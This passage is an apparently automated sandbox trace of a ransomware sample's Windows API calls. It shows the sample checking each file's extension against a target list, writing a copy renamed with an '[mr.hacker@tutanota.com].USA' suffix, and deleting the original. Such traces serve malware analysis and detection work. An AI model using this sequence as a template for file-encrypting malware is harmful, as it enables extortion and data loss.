4 [0035.064] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString=".docx") returned 5 [0035.064] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.064] lstrlenW (lpString=".pdf") returned 4 [0035.064] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString=".xls") returned 4 [0035.064] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString=".xlsx") returned 5 [0035.064] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.064] lstrlenW (lpString=".ppt") returned 4 [0035.064] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.064] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.064] lstrlenW (lpString=".zip") returned 4 [0035.064] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.064] lstrlenW (lpString=".rar") returned 4 [0035.064] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.065] lstrlenW (lpString=".bz2") returned 4 [0035.065] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.065] lstrlenW (lpString=".7z") returned 3 [0035.065] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.065] lstrlenW (lpString=".dbf") returned 4 [0035.065] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.065] lstrlenW (lpString=".1cd") returned 4 [0035.065] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.065] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0035.065] lstrlenW (lpString=".jpg") returned 4 [0035.065] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.065] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.065] lstrlenW (lpString="Setup.xml") returned 9 [0035.065] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.065] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=16683) returned 1 [0035.066] CloseHandle (hObject=0x17c) returned 1 [0035.066] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.066] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.066] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.066] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.066] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.066] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.066] GetLastError () returned 0x0 [0035.066] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x412b, lpOverlapped=0x0) returned 1 [0035.068] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x4130, lpOverlapped=0x0) returned 1 [0035.070] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.070] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.070] SetEndOfFile (hFile=0x180) returned 1 [0035.070] CloseHandle (hObject=0x180) returned 1 [0035.071] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.071] SetEndOfFile (hFile=0x17c) returned 1 [0035.071] CloseHandle (hObject=0x17c) returned 1 [0035.072] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.072] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.072] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.072] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.072] lstrlenW (lpString=".doc") returned 4 [0035.072] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.072] lstrlenW (lpString=".docx") returned 5 [0035.072] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.072] lstrlenW (lpString=".pdf") returned 4 [0035.072] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.072] lstrlenW (lpString=".xls") returned 4 [0035.072] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.072] lstrlenW (lpString=".xlsx") returned 5 [0035.072] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.072] lstrlenW (lpString=".ppt") returned 4 [0035.072] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.072] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.072] lstrlenW (lpString=".zip") returned 4 [0035.072] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.073] lstrlenW (lpString=".rar") returned 4 [0035.073] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString=".bz2") returned 4 [0035.073] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString=".7z") returned 3 [0035.073] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.073] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.073] lstrlenW (lpString=".dbf") returned 4 [0035.073] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.073] lstrlenW (lpString=".1cd") returned 4 [0035.073] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.073] lstrlenW (lpString=".jpg") returned 4 [0035.073] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.073] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.073] lstrlenW (lpString=".doc") returned 4 [0035.073] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString=".docx") returned 5 [0035.073] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.073] lstrlenW (lpString=".pdf") returned 4 [0035.073] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString=".xls") returned 4 [0035.073] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString=".xlsx") returned 5 [0035.073] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.073] lstrlenW (lpString=".ppt") returned 4 [0035.073] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.073] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.073] lstrlenW (lpString=".zip") returned 4 [0035.074] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.074] lstrlenW (lpString=".rar") returned 4 [0035.074] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.074] lstrlenW (lpString=".bz2") returned 4 [0035.074] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.074] lstrlenW (lpString=".7z") returned 3 [0035.074] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.074] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.074] lstrlenW (lpString=".dbf") returned 4 [0035.074] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.074] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.074] lstrlenW (lpString=".1cd") returned 4 [0035.074] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.074] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.074] lstrlenW (lpString=".jpg") returned 4 [0035.074] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.074] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.074] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.074] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.076] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=4274) returned 1 [0035.076] CloseHandle (hObject=0x17c) returned 1 [0035.076] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.076] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.076] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.076] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.076] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.076] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.077] GetLastError () returned 0x0 [0035.077] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x10b2, lpOverlapped=0x0) returned 1 [0035.308] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0035.309] ReadFile (in: hFile=0x17c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0035.309] WriteFile (in: hFile=0x180, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.309] SetEndOfFile (hFile=0x180) returned 1 [0035.310] CloseHandle (hObject=0x180) returned 1 [0035.310] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0035.310] SetEndOfFile (hFile=0x17c) returned 1 [0035.311] CloseHandle (hObject=0x17c) returned 1 [0035.311] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.312] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0035.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.312] lstrlenW (lpString=".doc") returned 4 [0035.312] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.312] lstrlenW (lpString=".docx") returned 5 [0035.312] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.312] lstrlenW (lpString=".pdf") returned 4 [0035.312] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.312] lstrlenW (lpString=".xls") returned 4 [0035.312] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.312] lstrlenW (lpString=".xlsx") returned 5 [0035.312] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.312] lstrlenW (lpString=".ppt") returned 4 [0035.312] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.312] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.312] lstrlenW (lpString=".zip") returned 4 [0035.312] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.312] lstrlenW (lpString=".rar") returned 4 [0035.312] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.312] lstrlenW (lpString=".bz2") returned 4 [0035.312] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString=".7z") returned 3 [0035.313] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.313] lstrlenW (lpString=".dbf") returned 4 [0035.313] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.313] lstrlenW (lpString=".1cd") returned 4 [0035.313] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.313] lstrlenW (lpString=".jpg") returned 4 [0035.313] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.313] lstrlenW (lpString=".doc") returned 4 [0035.313] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString=".docx") returned 5 [0035.313] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.313] lstrlenW (lpString=".pdf") returned 4 [0035.313] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString=".xls") returned 4 [0035.313] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString=".xlsx") returned 5 [0035.313] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.313] lstrlenW (lpString=".ppt") returned 4 [0035.313] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.313] lstrlenW (lpString=".zip") returned 4 [0035.313] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.313] lstrlenW (lpString=".rar") returned 4 [0035.313] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.313] lstrlenW (lpString=".bz2") returned 4 [0035.314] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.314] lstrlenW (lpString=".7z") returned 3 [0035.314] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.314] lstrlenW (lpString=".dbf") returned 4 [0035.314] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.314] lstrlenW (lpString=".1cd") returned 4 [0035.314] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.314] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0035.314] lstrlenW (lpString=".jpg") returned 4 [0035.314] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.314] lstrcmpiW (lpString1=".avi", lpString2=".USA") returned -1 [0035.314] lstrlenW (lpString="boxed-correct.avi") returned 17 [0035.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0036.312] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=89600) returned 1 [0036.312] CloseHandle (hObject=0x160) returned 1 [0036.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0036.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.312] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.312] lstrlenW (lpString=".doc") returned 4 [0036.312] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.312] lstrlenW (lpString=".docx") returned 5 [0036.312] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.313] lstrlenW (lpString=".pdf") returned 4 [0036.313] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString=".xls") returned 4 [0036.313] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString=".xlsx") returned 5 [0036.313] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.313] lstrlenW (lpString=".ppt") returned 4 [0036.313] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.313] lstrlenW (lpString=".zip") returned 4 [0036.313] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString=".rar") returned 4 [0036.313] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString=".bz2") returned 4 [0036.313] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString=".7z") returned 3 [0036.313] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.313] lstrlenW (lpString=".dbf") returned 4 [0036.313] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.313] lstrlenW (lpString=".1cd") returned 4 [0036.313] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.313] lstrlenW (lpString=".jpg") returned 4 [0036.313] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.313] lstrlenW (lpString=".doc") returned 4 [0036.313] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString=".docx") returned 5 [0036.314] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.314] lstrlenW (lpString=".pdf") returned 4 [0036.314] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString=".xls") returned 4 [0036.314] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString=".xlsx") returned 5 [0036.314] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.314] lstrlenW (lpString=".ppt") returned 4 [0036.314] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.314] lstrlenW (lpString=".zip") returned 4 [0036.314] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString=".rar") returned 4 [0036.314] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString=".bz2") returned 4 [0036.314] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString=".7z") returned 3 [0036.314] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.314] lstrlenW (lpString=".dbf") returned 4 [0036.314] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.314] lstrlenW (lpString=".1cd") returned 4 [0036.314] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.314] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0036.314] lstrlenW (lpString=".jpg") returned 4 [0036.314] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.315] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.315] lstrlenW (lpString="ipsnor.xml") returned 10 [0036.315] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.555] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=2580) returned 1 [0036.555] CloseHandle (hObject=0x1c8) returned 1 [0036.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft 